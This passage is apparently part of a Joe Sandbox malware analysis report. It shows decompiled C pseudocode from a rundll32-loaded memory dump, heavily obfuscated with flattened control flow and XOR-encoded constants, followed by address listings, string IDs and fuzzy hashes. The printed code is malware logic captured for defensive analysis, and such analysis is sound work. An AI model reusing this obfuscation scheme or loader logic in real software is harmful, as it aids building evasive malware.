                                                                      				_v76 = _v76 ^ 0x002da3d1;
                                                                      				_v44 = 0xb214;
                                                                      				_v44 = _v44 << 8;
                                                                      				_v44 = _v44 ^ 0x00b26442;
                                                                      				_v84 = 0xa70c;
                                                                      				_v84 = _v84 / _t847;
                                                                      				_v84 = _v84 ^ 0x00002a18;
                                                                      				_v68 = 0xaf49;
                                                                      				_t848 = 0x2e;
                                                                      				_v68 = _v68 / _t848;
                                                                      				_v68 = _v68 ^ 0x0000641b;
                                                                      				_v36 = 0x3ceb;
                                                                      				_t849 = 0x59;
                                                                      				_v36 = _v36 / _t849;
                                                                      				_v36 = _v36 ^ 0x0000250b;
                                                                      				_v140 = 0x9e7;
                                                                      				_v140 = _v140 ^ 0x2629db66;
                                                                      				_v140 = _v140 ^ 0xb17286d6;
                                                                      				_v140 = _v140 ^ 0x975b0c98;
                                                                      				_v232 = 0x59a3;
                                                                      				_v232 = _v232 + 0xffff4634;
                                                                      				_v232 = _v232 + 0xbf67;
                                                                      				_v232 = _v232 * 0x49;
                                                                      				_v232 = _v232 ^ 0x001b190f;
                                                                      				_v240 = 0x1d63;
                                                                      				_v240 = _v240 + 0xffffb330;
                                                                      				_v240 = _v240 << 5;
                                                                      				_v240 = _v240 | 0x294c4af2;
                                                                      				_v240 = _v240 ^ 0xfffe5dea;
                                                                      				_v96 = 0xdd85;
                                                                      				_v96 = _v96 / _t849;
                                                                      				_v96 = _v96 ^ 0x00000a46;
                                                                      				_v248 = 0x1e49;
                                                                      				_t850 = 0x45;
                                                                      				_v248 = _v248 / _t850;
                                                                      				_v248 = _v248 >> 4;
                                                                      				_t851 = 0x1e;
                                                                      				_v248 = _v248 * 0xa;
                                                                      				_v248 = _v248 ^ 0x000078ce;
                                                                      				_v160 = 0x9fac;
                                                                      				_v160 = _v160 / _t851;
                                                                      				_v160 = _v160 + 0xffff662a;
                                                                      				_v160 = _v160 ^ 0xffff2cd4;
                                                                      				_v56 = 0x53a;
                                                                      				_v56 = _v56 >> 8;
                                                                      				_v56 = _v56 ^ 0x000063d6;
                                                                      				_v208 = 0x254f;
                                                                      				_v208 = _v208 + 0xffff5d99;
                                                                      				_v208 = _v208 >> 6;
                                                                      				_v208 = _v208 >> 8;
                                                                      				_v208 = _v208 ^ 0x0003aa31;
                                                                      				_v136 = 0xe4f;
                                                                      				_t852 = 5;
                                                                      				_v136 = _v136 / _t852;
                                                                      				_t853 = 0x59;
                                                                      				_v136 = _v136 / _t853;
                                                                      				_v136 = _v136 ^ 0x00004294;
                                                                      				_v200 = 0xf4ca;
                                                                      				_v200 = _v200 + 0xfcaa;
                                                                      				_v200 = _v200 << 0x10;
                                                                      				_v200 = _v200 + 0x7aed;
                                                                      				_v200 = _v200 ^ 0xf1741e18;
                                                                      				_v120 = 0x8825;
                                                                      				_v120 = _v120 ^ 0xde537c51;
                                                                      				_v120 = _v120 + 0xffff7f06;
                                                                      				_v120 = _v120 ^ 0xde5329e7;
                                                                      				_v128 = 0x8774;
                                                                      				_v128 = _v128 * 0x60;
                                                                      				_v128 = _v128 >> 9;
                                                                      				_v128 = _v128 ^ 0x000048ff;
                                                                      				_t854 = _v16;
                                                                      				_t702 = _v284;
                                                                      				while(1) {
                                                                      					L1:
                                                                      					_t815 = 0x1a641754;
                                                                      					while(1) {
                                                                      						_t865 = _t855 - _t815;
                                                                      						if(_t865 > 0) {
                                                                      							goto L19;
                                                                      						}
                                                                      						L3:
                                                                      						if(_t865 == 0) {
                                                                      							__eflags = E01FF9D2F(_t854, _a4);
                                                                      							_t855 = 0x323551c7;
                                                                      							_t720 = 1;
                                                                      							_t861 =  !=  ? _t720 : _t861;
                                                                      							goto L13;
                                                                      						} else {
                                                                      							if(_t855 == 0x175d2af) {
                                                                      								_t855 = 0x3b541ff0;
                                                                      								continue;
                                                                      							} else {
                                                                      								if(_t855 == 0x5ea51a5) {
                                                                      									_push(_t745);
                                                                      									_t702 = E02007AF1(_v244, _v48, _v24, _t745, _a36, _t745, _a16, _t745, _v156, _v212, _v252, _v228);
                                                                      									_t863 = _t863 + 0x2c;
                                                                      									_v284 = _t702;
                                                                      									__eflags = _t702;
                                                                      									_t855 =  !=  ? 0xa2907ca : 0x6317f3c;
                                                                      									goto L14;
                                                                      								} else {
                                                                      									if(_t855 == 0x6317f3c) {
                                                                      										E01FF7E91(_v24, _v120, _v128);
                                                                      									} else {
                                                                      										if(_t855 == 0x9b9cf87) {
                                                                      											__eflags = E0200C2F5(_t854, _v204, __eflags) - _v260;
                                                                      											_t815 = 0x1a641754;
                                                                      											_t702 = _v284;
                                                                      											_t745 = _v288;
                                                                      											_t855 =  ==  ? 0x1a641754 : 0x323551c7;
                                                                      											continue;
                                                                      										} else {
                                                                      											if(_t855 != 0xa2907ca) {
                                                                      												L41:
                                                                      												__eflags = _t855 - 0x34df9831;
                                                                      												if(__eflags != 0) {
                                                                      													_t702 = _v284;
                                                                      													while(1) {
                                                                      														_t865 = _t855 - _t815;
                                                                      														if(_t865 > 0) {
                                                                      															goto L19;
                                                                      														}
                                                                      														goto L3;
                                                                      													}
                                                                      													goto L19;
                                                                      												}
                                                                      											} else {
                                                                      												_t871 = _t740;
                                                                      												if(_t740 != 0) {
                                                                      													_push(0x1ff1640);
                                                                      													_push(_v52);
                                                                      													_push(_v220);
                                                                      													_t739 = E01FF5DFC(_v40, _v108, _t871);
                                                                      													_t745 = _t739;
                                                                      													_t863 = _t863 + 0xc;
                                                                      													_v288 = _t739;
                                                                      												}
                                                                      												_t564 =  &_v92; // 0xa46
                                                                      												_t734 = E020023BF(_v32, _v268, _a12, _t745, _t745, _v176 | _v188 | _v100 | _v124 | _v180 | _v148 | _v172 | _v132 | _v116, _v284, _t745, _t745, _v236, _t745, _v164,  *_t564);
                                                                      												_t854 = _t734;
                                                                      												_t760 = _v76;
                                                                      												E02000D6D(_v76, _v44, _v84, _v288);
                                                                      												_t863 = _t863 + 0x34;
                                                                      												if(_t734 == 0) {
                                                                      													L38:
                                                                      													_t855 = 0x24a54ebe;
                                                                      												} else {
                                                                      													_v12 = 1;
                                                                      													_t738 = E01FFA074( &_v12, _t760, _v68, _v36, _t854, _v140);
                                                                      													_t863 = _t863 + 0x14;
                                                                      													_v12 = _t738;
                                                                      													_t855 = 0x35deb4bf;
                                                                      												}
                                                                      												L13:
                                                                      												_t702 = _v284;
                                                                      												L14:
                                                                      												_t745 = _v288;
                                                                      												goto L1;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L44:
                                                                      						return _t861;
                                                                      						L19:
                                                                      						__eflags = _t855 - 0x24a54ebe;
                                                                      						if(_t855 == 0x24a54ebe) {
                                                                      							E01FF7E91(_t702, _v136, _v200);
                                                                      							_t855 = 0x6317f3c;
                                                                      							goto L40;
                                                                      						} else {
                                                                      							__eflags = _t855 - 0x323551c7;
                                                                      							if(_t855 == 0x323551c7) {
                                                                      								E01FF7E91(_t854, _v56, _v208);
                                                                      								goto L38;
                                                                      							} else {
                                                                      								__eflags = _t855 - 0x335a9f57;
                                                                      								if(_t855 == 0x335a9f57) {
                                                                      									_push(_t745);
                                                                      									_t706 = E01FFF853(_v72, _v144, _v152, _v80, _v224, _v28, _t745, _t745, _v88);
                                                                      									__eflags = _t706;
                                                                      									_v24 = _t706;
                                                                      									_t855 =  !=  ? 0x5ea51a5 : 0x34df9831;
                                                                      									E01FFDE81(_v216, _v28, _v64);
                                                                      									_t863 = _t863 + 0x24;
                                                                      									L40:
                                                                      									_t745 = _v288;
                                                                      									_t815 = 0x1a641754;
                                                                      									goto L41;
                                                                      								} else {
                                                                      									__eflags = _t855 - 0x35deb4bf;
                                                                      									if(_t855 == 0x35deb4bf) {
                                                                      										__eflags = _t740;
                                                                      										if(_t740 == 0) {
                                                                      											_t750 = 0;
                                                                      											__eflags = 0;
                                                                      										} else {
                                                                      											_t750 =  *_t740;
                                                                      										}
                                                                      										__eflags = _t740;
                                                                      										if(_t740 == 0) {
                                                                      											_t709 = 0;
                                                                      											__eflags = 0;
                                                                      										} else {
                                                                      											_t709 =  *((intOrPtr*)(_t740 + 4));
                                                                      										}
                                                                      										E020046C1(_v16, _t854, _t750, _v232, _v240, _v96, _t709, _v248, _t750, _v160);
                                                                      										_t863 = _t863 + 0x20;
                                                                      										asm("sbb esi, esi");
                                                                      										_t855 = (_t855 & 0xd7847dc0) + 0x323551c7;
                                                                      										goto L13;
                                                                      									} else {
                                                                      										__eflags = _t855 - 0x3b541ff0;
                                                                      										if(_t855 != 0x3b541ff0) {
                                                                      											goto L41;
                                                                      										} else {
                                                                      											_v20 = 0x200;
                                                                      											_t714 = E01FF54FB(0x200);
                                                                      											_t858 = _t714;
                                                                      											_t764 = 0x200;
                                                                      											__eflags = _t714;
                                                                      											if(__eflags != 0) {
                                                                      												_t716 = E01FF71C3(_v184, _v104, _t858, _v280, _v192,  &_v20);
                                                                      												_t863 = _t863 + 0x14;
                                                                      												__eflags = _t716;
                                                                      												if(_t716 == 0) {
                                                                      													_push(_v276);
                                                                      													_push(_t764);
                                                                      													_t718 = E01FFECFE(_v256, _v264, _t858, _v272, _t764);
                                                                      													_t863 = _t863 + 0x14;
                                                                      													_v28 = _t718;
                                                                      												}
                                                                      												E01FFDE81(_v168, _t858, _v196);
                                                                      											}
                                                                      											_t855 = 0x335a9f57;
                                                                      											goto L13;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L44;
                                                                      					}
                                                                      				}
                                                                      			}

                                                                      0x02008765
                                                                      0x02008768
                                                                      0x0200876f
                                                                      0x0200876f
                                                                      0x02008774
                                                                      0x02008774
                                                                      0x02008778
                                                                      0x02008778
                                                                      0x00000000
                                                                      0x02008778
                                                                      0x0200866b
                                                                      0x0200865e
                                                                      0x02008652
                                                                      0x02008646
                                                                      0x02008639
                                                                      0x02008a28
                                                                      0x02008a32
                                                                      0x0200882d
                                                                      0x0200882d
                                                                      0x02008833
                                                                      0x020089e6
                                                                      0x020089ec
                                                                      0x00000000
                                                                      0x02008839
                                                                      0x02008839
                                                                      0x0200883f
                                                                      0x020089c9
                                                                      0x00000000
                                                                      0x02008845
                                                                      0x02008845
                                                                      0x0200884b
                                                                      0x02008954
                                                                      0x02008985
                                                                      0x02008998
                                                                      0x020089a3
                                                                      0x020089af
                                                                      0x020089b2
                                                                      0x020089b7
                                                                      0x020089f1
                                                                      0x020089f1
                                                                      0x020089f5
                                                                      0x00000000
                                                                      0x02008851
                                                                      0x02008851
                                                                      0x02008857
                                                                      0x020088fc
                                                                      0x020088fe
                                                                      0x02008904
                                                                      0x02008904
                                                                      0x02008900
                                                                      0x02008900
                                                                      0x02008900
                                                                      0x02008906
                                                                      0x02008908
                                                                      0x0200890f
                                                                      0x0200890f
                                                                      0x0200890a
                                                                      0x0200890a
                                                                      0x0200890a
                                                                      0x02008937
                                                                      0x0200893c
                                                                      0x02008941
                                                                      0x02008949
                                                                      0x00000000
                                                                      0x0200885d
                                                                      0x0200885d
                                                                      0x02008863
                                                                      0x00000000
                                                                      0x02008869
                                                                      0x0200887f
                                                                      0x02008886
                                                                      0x0200888b
                                                                      0x0200888d
                                                                      0x0200888e
                                                                      0x02008890
                                                                      0x020088b1
                                                                      0x020088b6
                                                                      0x020088b9
                                                                      0x020088bb
                                                                      0x020088bd
                                                                      0x020088c1
                                                                      0x020088d0
                                                                      0x020088d5
                                                                      0x020088d8
                                                                      0x020088d8
                                                                      0x020088ec
                                                                      0x020088f1
                                                                      0x020088f2
                                                                      0x00000000
                                                                      0x020088f2
                                                                      0x02008863
                                                                      0x02008857
                                                                      0x0200884b
                                                                      0x0200883f
                                                                      0x00000000
                                                                      0x02008833
                                                                      0x02008625

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: q$1=v$5$:G$Fe$He$O 6$O%$P26$m$<$^$w$z
                                                                      • API String ID: 0-1231479166
                                                                      • Opcode ID: f5d75e6bb194d5ec7080a0f00db001f30562f84d1eedb069fdbbd5eb217b98b8
                                                                      • Instruction ID: 15f44f6a343bffd7260a835d4e6a3ff006e12d919fe9325406ed226134f1e340
                                                                      • Opcode Fuzzy Hash: f5d75e6bb194d5ec7080a0f00db001f30562f84d1eedb069fdbbd5eb217b98b8
                                                                      • Instruction Fuzzy Hash: 0872F0715083818BE379CF25C889B9FBBE2BBC4318F10891DE6D9962A0D7B59845CF53
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: q$1=v$5$:G$Fe$He$O 6$O%$P26$m$<$^$w$z
                                                                      • API String ID: 0-1231479166
                                                                      • Opcode ID: 90f7e4b74cd69b9e8d8fb0eb31b32ba8bcc002e4b44665f3d9518842981e090a
                                                                      • Instruction ID: 6d764030fe530d9958ec29012dcbe0b680c7f7e625d7a7d671b22c8a020747be
                                                                      • Opcode Fuzzy Hash: 90f7e4b74cd69b9e8d8fb0eb31b32ba8bcc002e4b44665f3d9518842981e090a
                                                                      • Instruction Fuzzy Hash: 9372007161C3818BE378CF25C88AB9BBBE1BBC4714F10891DE5D9962A0D7B58859CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E01FF67EF(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                      				intOrPtr _v4;
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _v12;
                                                                      				char _v16;
                                                                      				char _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				unsigned int _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				signed int _v92;
                                                                      				signed int _v96;
                                                                      				signed int _v100;
                                                                      				signed int _v104;
                                                                      				signed int _v108;
                                                                      				signed int _v112;
                                                                      				signed int _v116;
                                                                      				signed int _v120;
                                                                      				signed int _v124;
                                                                      				signed int _v128;
                                                                      				signed int _v132;
                                                                      				signed int _v136;
                                                                      				signed int _v140;
                                                                      				signed int _v144;
                                                                      				signed int _v148;
                                                                      				signed int _v152;
                                                                      				signed int _v156;
                                                                      				signed int _v160;
                                                                      				signed int _v164;
                                                                      				signed int _v168;
                                                                      				signed int _v172;
                                                                      				signed int _v176;
                                                                      				signed int _v180;
                                                                      				signed int _v184;
                                                                      				signed int _v188;
                                                                      				unsigned int _v192;
                                                                      				signed int _v196;
                                                                      				signed int _v200;
                                                                      				unsigned int _v204;
                                                                      				signed int _v208;
                                                                      				signed int _v212;
                                                                      				void* _t431;
                                                                      				intOrPtr _t476;
                                                                      				intOrPtr _t482;
                                                                      				intOrPtr _t483;
                                                                      				signed int _t485;
                                                                      				signed int _t487;
                                                                      				signed int _t493;
                                                                      				intOrPtr _t494;
                                                                      				void* _t495;
                                                                      				intOrPtr _t503;
                                                                      				intOrPtr _t505;
                                                                      				signed int _t509;
                                                                      				signed int* _t510;
                                                                      				signed int _t512;
                                                                      				signed int _t513;
                                                                      				signed int _t514;
                                                                      				signed int _t515;
                                                                      				signed int _t516;
                                                                      				signed int _t517;
                                                                      				signed int _t518;
                                                                      				signed int _t519;
                                                                      				signed int _t520;
                                                                      				signed int _t521;
                                                                      				signed int _t522;
                                                                      				intOrPtr _t526;
                                                                      				intOrPtr _t554;
                                                                      				intOrPtr _t558;
                                                                      				void* _t559;
                                                                      				intOrPtr _t561;
                                                                      				intOrPtr _t565;
                                                                      				void* _t567;
                                                                      				signed int* _t582;
                                                                      				void* _t585;
                                                                      
                                                                      				_push(_a8);
                                                                      				_t510 = __ecx;
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t431);
                                                                      				_v12 = 0x17937f;
                                                                      				_t565 = 0;
                                                                      				_v8 = 0x716496;
                                                                      				_t582 =  &(( &_v212)[4]);
                                                                      				_v4 = 0;
                                                                      				_v140 = 0x4104;
                                                                      				_t567 = 0x31a072da;
                                                                      				_v140 = _v140 + 0x447c;
                                                                      				_t512 = 0x2c;
                                                                      				_v140 = _v140 * 0x19;
                                                                      				_v140 = _v140 ^ 0x000d6f8e;
                                                                      				_v128 = 0xcf3;
                                                                      				_v128 = _v128 + 0xfffff042;
                                                                      				_v128 = _v128 * 0x3e;
                                                                      				_v128 = _v128 ^ 0xffffd2d2;
                                                                      				_v124 = 0x2a0f;
                                                                      				_v124 = _v124 << 7;
                                                                      				_v124 = _v124 * 0x70;
                                                                      				_v124 = _v124 ^ 0x0933c800;
                                                                      				_v148 = 0x338f;
                                                                      				_v148 = _v148 / _t512;
                                                                      				_v148 = _v148 + 0xffff0b9c;
                                                                      				_v148 = _v148 ^ 0xffff0cc6;
                                                                      				_v96 = 0x90ec;
                                                                      				_v96 = _v96 | 0x4c75b133;
                                                                      				_v96 = _v96 ^ 0x4c75b1bf;
                                                                      				_v48 = 0x862e;
                                                                      				_v48 = _v48 >> 9;
                                                                      				_v48 = _v48 ^ 0xf0000043;
                                                                      				_v192 = 0xba1e;
                                                                      				_v192 = _v192 >> 0xd;
                                                                      				_v192 = _v192 << 0x10;
                                                                      				_v192 = _v192 >> 0xd;
                                                                      				_v192 = _v192 ^ 0x000059bb;
                                                                      				_v200 = 0x378e;
                                                                      				_v200 = _v200 + 0xffff308c;
                                                                      				_v200 = _v200 | 0x3e586b1b;
                                                                      				_v200 = _v200 ^ 0x5185d5a4;
                                                                      				_v200 = _v200 ^ 0xae7ac2ae;
                                                                      				_v168 = 0xb2ed;
                                                                      				_t513 = 0x5d;
                                                                      				_v168 = _v168 / _t513;
                                                                      				_v168 = _v168 | 0xc5bdafdd;
                                                                      				_v168 = _v168 ^ 0xc5bde408;
                                                                      				_v176 = 0xc4df;
                                                                      				_v176 = _v176 >> 2;
                                                                      				_v176 = _v176 ^ 0xd9c03405;
                                                                      				_v176 = _v176 * 0x17;
                                                                      				_v176 = _v176 ^ 0x90401e33;
                                                                      				_v116 = 0x79ce;
                                                                      				_v116 = _v116 * 0x3b;
                                                                      				_v116 = _v116 << 4;
                                                                      				_v116 = _v116 ^ 0x01c12efe;
                                                                      				_v88 = 0x4199;
                                                                      				_v88 = _v88 >> 1;
                                                                      				_v88 = _v88 ^ 0x000016ee;
                                                                      				_v32 = 0xc8e6;
                                                                      				_v32 = _v32 | 0x9bed8174;
                                                                      				_v32 = _v32 ^ 0x9bed9e1f;
                                                                      				_v188 = 0x5390;
                                                                      				_t514 = 0x3a;
                                                                      				_v188 = _v188 / _t514;
                                                                      				_v188 = _v188 << 6;
                                                                      				_v188 = _v188 | 0x3d2eb713;
                                                                      				_v188 = _v188 ^ 0x3d2edd0a;
                                                                      				_v204 = 0x58fb;
                                                                      				_v204 = _v204 >> 6;
                                                                      				_v204 = _v204 + 0xf15b;
                                                                      				_v204 = _v204 ^ 0x0000d418;
                                                                      				_v72 = 0x9f3d;
                                                                      				_v72 = _v72 + 0xffff3777;
                                                                      				_v72 = _v72 ^ 0xffff8242;
                                                                      				_v24 = 0xde3b;
                                                                      				_t515 = 0xc;
                                                                      				_v24 = _v24 * 0x21;
                                                                      				_v24 = _v24 ^ 0x001cbf65;
                                                                      				_v52 = 0x9dec;
                                                                      				_v52 = _v52 | 0xa1e041a1;
                                                                      				_v52 = _v52 ^ 0xa1e09fab;
                                                                      				_v108 = 0x27;
                                                                      				_v108 = _v108 + 0xffffcee9;
                                                                      				_v108 = _v108 + 0x86d7;
                                                                      				_v108 = _v108 ^ 0x00006510;
                                                                      				_v60 = 0x3380;
                                                                      				_v60 = _v60 ^ 0xb4567d2a;
                                                                      				_v60 = _v60 ^ 0xb4565f0c;
                                                                      				_v68 = 0x71f5;
                                                                      				_v68 = _v68 >> 0xd;
                                                                      				_v68 = _v68 ^ 0x00006eec;
                                                                      				_v132 = 0x63a2;
                                                                      				_v132 = _v132 | 0xa34eb625;
                                                                      				_v132 = _v132 << 0x10;
                                                                      				_v132 = _v132 ^ 0xf7a77efa;
                                                                      				_v84 = 0x4025;
                                                                      				_v84 = _v84 >> 3;
                                                                      				_v84 = _v84 ^ 0x0000336a;
                                                                      				_v92 = 0xf737;
                                                                      				_v92 = _v92 / _t515;
                                                                      				_v92 = _v92 ^ 0x000070d8;
                                                                      				_v112 = 0xe747;
                                                                      				_t516 = 0x45;
                                                                      				_v112 = _v112 / _t516;
                                                                      				_v112 = _v112 << 1;
                                                                      				_v112 = _v112 ^ 0x00003bc1;
                                                                      				_v100 = 0x5c9c;
                                                                      				_v100 = _v100 << 5;
                                                                      				_v100 = _v100 ^ 0x000ba43a;
                                                                      				_v56 = 0x8dc3;
                                                                      				_t517 = 0x46;
                                                                      				_v56 = _v56 * 0x53;
                                                                      				_v56 = _v56 ^ 0x002dfe13;
                                                                      				_v144 = 0x7f61;
                                                                      				_v144 = _v144 * 0x38;
                                                                      				_v144 = _v144 ^ 0x6f8821ea;
                                                                      				_v144 = _v144 ^ 0x6f938ffa;
                                                                      				_v160 = 0x339d;
                                                                      				_v160 = _v160 / _t517;
                                                                      				_v160 = _v160 >> 0xe;
                                                                      				_v160 = _v160 ^ 0x00006f53;
                                                                      				_v136 = 0xb124;
                                                                      				_v136 = _v136 * 0x7c;
                                                                      				_v136 = _v136 * 0x3b;
                                                                      				_v136 = _v136 ^ 0x13c6547a;
                                                                      				_v196 = 0xba81;
                                                                      				_v196 = _v196 / _t517;
                                                                      				_t518 = 0x70;
                                                                      				_v196 = _v196 / _t518;
                                                                      				_v196 = _v196 + 0x66bc;
                                                                      				_v196 = _v196 ^ 0x00000a53;
                                                                      				_v36 = 0x2f28;
                                                                      				_t519 = 0x7d;
                                                                      				_v36 = _v36 * 0x2b;
                                                                      				_v36 = _v36 ^ 0x0007f00e;
                                                                      				_v184 = 0xa6cb;
                                                                      				_v184 = _v184 << 4;
                                                                      				_v184 = _v184 >> 0xe;
                                                                      				_v184 = _v184 * 0x42;
                                                                      				_v184 = _v184 ^ 0x00006eb4;
                                                                      				_v44 = 0x29af;
                                                                      				_v44 = _v44 / _t519;
                                                                      				_v44 = _v44 ^ 0x00000c2e;
                                                                      				_v76 = 0xf2bd;
                                                                      				_v76 = _v76 + 0xffff85ae;
                                                                      				_v76 = _v76 ^ 0x0000580a;
                                                                      				_v180 = 0x9e33;
                                                                      				_v180 = _v180 + 0xb14;
                                                                      				_t520 = 0x22;
                                                                      				_v180 = _v180 / _t520;
                                                                      				_v180 = _v180 ^ 0x06128f94;
                                                                      				_v180 = _v180 ^ 0x061285a5;
                                                                      				_v156 = 0xb8a6;
                                                                      				_v156 = _v156 + 0xffff4ef3;
                                                                      				_v156 = _v156 + 0xffff8947;
                                                                      				_v156 = _v156 ^ 0xffffe205;
                                                                      				_v28 = 0xff3d;
                                                                      				_v28 = _v28 * 0x62;
                                                                      				_v28 = _v28 ^ 0x0061cef4;
                                                                      				_v152 = 0x8aff;
                                                                      				_v152 = _v152 >> 0xe;
                                                                      				_v152 = _v152 >> 5;
                                                                      				_v152 = _v152 ^ 0x00004619;
                                                                      				_v64 = 0x955d;
                                                                      				_v64 = _v64 >> 0xe;
                                                                      				_v64 = _v64 ^ 0x00007002;
                                                                      				_v172 = 0x4f5b;
                                                                      				_v172 = _v172 >> 7;
                                                                      				_v172 = _v172 | 0xb7eb094d;
                                                                      				_v172 = _v172 + 0xee15;
                                                                      				_v172 = _v172 ^ 0xb7ebdb2b;
                                                                      				_v40 = 0xb46c;
                                                                      				_v40 = _v40 * 0x5c;
                                                                      				_v40 = _v40 ^ 0x0040dad9;
                                                                      				_v120 = 0x778c;
                                                                      				_v120 = _v120 << 2;
                                                                      				_v120 = _v120 << 0xf;
                                                                      				_v120 = _v120 ^ 0xef181660;
                                                                      				_v80 = 0x755c;
                                                                      				_v80 = _v80 >> 1;
                                                                      				_v80 = _v80 ^ 0x00007efb;
                                                                      				_v104 = 0xe94f;
                                                                      				_v104 = _v104 << 3;
                                                                      				_v104 = _v104 ^ 0x00077cc2;
                                                                      				_v208 = 0xae0c;
                                                                      				_v208 = _v208 + 0xffffc94b;
                                                                      				_v208 = _v208 << 8;
                                                                      				_t521 = 0x63;
                                                                      				_v208 = _v208 / _t521;
                                                                      				_v208 = _v208 ^ 0x00003498;
                                                                      				_v212 = 0xbf25;
                                                                      				_t522 = 0x31;
                                                                      				_v212 = _v212 * 0x38;
                                                                      				_v212 = _v212 + 0xffffb183;
                                                                      				_v212 = _v212 / _t522;
                                                                      				_v212 = _v212 ^ 0x0000d8ca;
                                                                      				_v164 = 0x4b56;
                                                                      				_v164 = _v164 + 0xd39e;
                                                                      				_v164 = _v164 >> 8;
                                                                      				_v164 = _v164 ^ 0x0000011f;
                                                                      				goto L1;
                                                                      				do {
                                                                      					while(1) {
                                                                      						L1:
                                                                      						_t585 = _t567 - 0x2d4d5f48;
                                                                      						if(_t585 > 0) {
                                                                      							break;
                                                                      						}
                                                                      						if(_t585 == 0) {
                                                                      							_t483 =  *0x2010400; // 0x0
                                                                      							_t554 =  *0x2010400; // 0x0
                                                                      							_t522 = _v76;
                                                                      							_t485 = E020092C8(_t522,  *((intOrPtr*)(_t554 + 0xc)), _v140, _v180, _v148, _t483 + 0x10, _v156);
                                                                      							_t582 =  &(_t582[5]);
                                                                      							asm("sbb esi, esi");
                                                                      							_t567 = ( ~_t485 & 0xe2706b8a) + 0x2fe1d82b;
                                                                      							continue;
                                                                      						} else {
                                                                      							if(_t567 == 0xf182b02) {
                                                                      								_t526 =  *0x2010400; // 0x0
                                                                      								_t394 = _t526 + 0x18; // 0x18
                                                                      								_t487 = E02003297(_v84, _v16, _v92, _v112, _v20, _t526,  *((intOrPtr*)(_t526 + 0xc)), _t394, _v100, _t522, _v56, _v144);
                                                                      								_t522 = _v160;
                                                                      								asm("sbb esi, esi");
                                                                      								_t567 = ( ~_t487 & 0x19013217) + 0x144c2d31;
                                                                      								E02001C64(_t522, _v136, _v196, _v20);
                                                                      								_t582 =  &(_t582[0xc]);
                                                                      								goto L23;
                                                                      							} else {
                                                                      								if(_t567 == 0x125243b5) {
                                                                      									_t494 =  *0x2010400; // 0x0
                                                                      									_t522 = _v28;
                                                                      									_t495 = E01FF6716(_t522, _v128, _t522, _t522,  *((intOrPtr*)(_t494 + 0xc)), _v152, _v64, _t522, _v172, _v40);
                                                                      									_t582 =  &(_t582[8]);
                                                                      									if(_t495 != 0) {
                                                                      										_t565 = 1;
                                                                      									} else {
                                                                      										_t567 = 0x16479e62;
                                                                      										continue;
                                                                      									}
                                                                      								} else {
                                                                      									if(_t567 == 0x144c2d31) {
                                                                      										_t561 =  *0x2010400; // 0x0
                                                                      										E01FF9AC4( *((intOrPtr*)(_t561 + 0xc)));
                                                                      										_t582 = _t582 - 0xc + 0xc;
                                                                      										_t567 = 0x30e289f7;
                                                                      										continue;
                                                                      									} else {
                                                                      										if(_t567 == 0x16479e62) {
                                                                      											_t503 =  *0x2010400; // 0x0
                                                                      											E01FFC9EE(_t522,  *((intOrPtr*)(_t503 + 0x10)));
                                                                      											_pop(_t522);
                                                                      											_t567 = 0x2fe1d82b;
                                                                      											continue;
                                                                      										} else {
                                                                      											if(_t567 != 0x241bb339) {
                                                                      												goto L23;
                                                                      											} else {
                                                                      												_t505 =  *0x2010400; // 0x0
                                                                      												_t522 = _v116;
                                                                      												_t509 = E02002ABE(_t522, _v88, _t522, _v32, _v188, _t522, _t522, _v48 | _v96, _t505 + 0xc);
                                                                      												_t582 =  &(_t582[7]);
                                                                      												asm("sbb esi, esi");
                                                                      												_t567 = ( ~_t509 & 0x05a58119) + 0x30e289f7;
                                                                      												continue;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L27:
                                                                      						return _t565;
                                                                      					}
                                                                      					if(_t567 == 0x2fe1d82b) {
                                                                      						_t476 =  *0x2010400; // 0x0
                                                                      						E01FFC9EE(_t522,  *((intOrPtr*)(_t476 + 0x18)));
                                                                      						_pop(_t522);
                                                                      						_t567 = 0x144c2d31;
                                                                      						goto L23;
                                                                      					} else {
                                                                      						if(_t567 == 0x30e289f7) {
                                                                      							_t558 =  *0x2010400; // 0x0
                                                                      							E01FFDE81(_v168, _t558, _v176);
                                                                      						} else {
                                                                      							if(_t567 == 0x31a072da) {
                                                                      								_t559 = 0x24;
                                                                      								_t482 = E01FF54FB(_t559);
                                                                      								 *0x2010400 = _t482;
                                                                      								_t522 = _t522;
                                                                      								if(_t482 != 0) {
                                                                      									_t567 = 0x241bb339;
                                                                      									goto L1;
                                                                      								}
                                                                      							} else {
                                                                      								if(_t567 != 0x36880b10) {
                                                                      									goto L23;
                                                                      								} else {
                                                                      									_t522 =  *_t510;
